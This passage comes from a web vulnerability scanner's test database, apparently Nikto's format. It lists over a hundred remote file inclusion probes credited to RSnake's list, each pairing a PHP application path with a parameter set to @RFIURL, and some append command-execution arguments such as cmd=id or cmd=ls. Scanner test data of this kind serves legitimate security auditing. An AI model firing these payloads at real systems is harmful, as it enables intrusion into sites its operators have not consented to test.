list.\",\"\",\"\"\n\"004188\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004189\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004190\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004191\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004192\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_jreactions/langset.php?comPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004193\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004194\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004195\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004196\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004197\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004198\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004199\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004200\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004201\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004202\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004203\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004204\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004205\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004206\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004207\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004208\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004209\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004210\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004211\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004212\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004213\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004214\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_webring/admin.webring.docs.php?component_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004215\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004216\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004217\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004218\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/menu_add.php?site_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004219\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/administrator/menu_operation.php?site_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004220\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004221\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004222\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adodb/adodb-errorpear.inc.php?ourlinux_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004223\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adodb/adodb-pear.inc.php?ourlinux_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004224\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adodb/adodb.inc.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004225\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/advanced_comment_system/admin.php?ACS_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004226\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/advanced_comment_system/index.php?ACS_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004227\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004228\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004229\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/agenda.php3?rootagenda=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004230\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/agenda2.php3?rootagenda=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004231\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/aides/index.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004232\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ains_main.php?ains_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004233\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ajax/loadsplash.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004234\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ajouter.php?include=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004235\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/akarru.gui/main_content.php?bm_content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004236\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/akocomments.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004237\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/amazon/cart.php?cmd=add&asin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004238\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/amazon/index.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004239\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/amazon/info.php?asin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004240\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/annonce.php?page=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004241\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/announcements.php?phpraid_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004242\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/anzagien.php?config[root_ordner]=@RFIURL?cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004243\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/apbn/templates/head.php?APB_SETTINGS[template_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004244\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/api.php?t_path_core=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004245\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/apps/apps.php?app=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004246\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/appserv/main.php?appserv_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004247\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/arab3upload/customize.php?path=@RFIURL?&cmd=pwd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004248\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/arab3upload/initialize.php?path=@RFIURL?&cmd=pwd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004249\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/arash_lib/class/arash_gadmin.class.php?arashlib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004250\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/arash_lib/class/arash_sadmin.class.php?arashlib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004251\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/arash_lib/include/edit.inc.php?arashlib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004252\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/arash_lib/include/list_features.inc.php?arashlib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004253\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/archive.php?scriptpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004254\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004255\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/artlist.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004256\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=@RFIURL?cmd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004257\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004258\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/athena.php?athena_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004259\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auction/auction_common.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004260\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auction/includes/converter.inc.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004261\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auction/includes/messages.inc.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004262\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auction/includes/settings.inc.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004263\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auction/phpAdsNew/view.inc.php?phpAds_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004264\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auth.cookie.inc.php?da_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004265\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auth.header.inc.php?da_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004266\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auth.sessions.inc.php?da_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004267\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auth/auth.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004268\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auth/auth_phpbb/phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004269\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/authenticate.php?default_path_for_themes=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004270\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004271\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004272\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/auto_check_renewals.php?installed_config_file=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004273\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/autoindex.php?cfg_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004274\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/awzmb/adminhelp.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004275\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004276\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004277\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004278\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/awzmb/modules/help.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004279\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004280\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/axoverzicht.cgi?maand=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004281\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/b2-tools/gm-2-b2.php?b2inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004282\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/b2verifauth.php?index=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004283\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/backend/addons/links/index.php?PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004284\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/basebuilder/src/main.inc.php?mj_config[src_path]=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004285\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bb_admin.php?includeFooter=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004286\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/beacon/language/1/splash.lang.php?languagePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004287\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/beacon/language/1/splash.lang.php?languagePath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004288\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/belegungsplan/jahresuebersicht.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004289\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/belegungsplan/monatsuebersicht.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004290\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/belegungsplan/tagesuebersicht.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004291\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/belegungsplan/wochenuebersicht.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004292\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bemarket/postscript/postscript.php?p_mode=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004293\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_form.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004294\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_pldetails.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004295\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_plform.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004296\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_plsearchc.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004297\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_plsearchs.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004298\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004299\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_searchc.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004300\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/bib_searchs.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 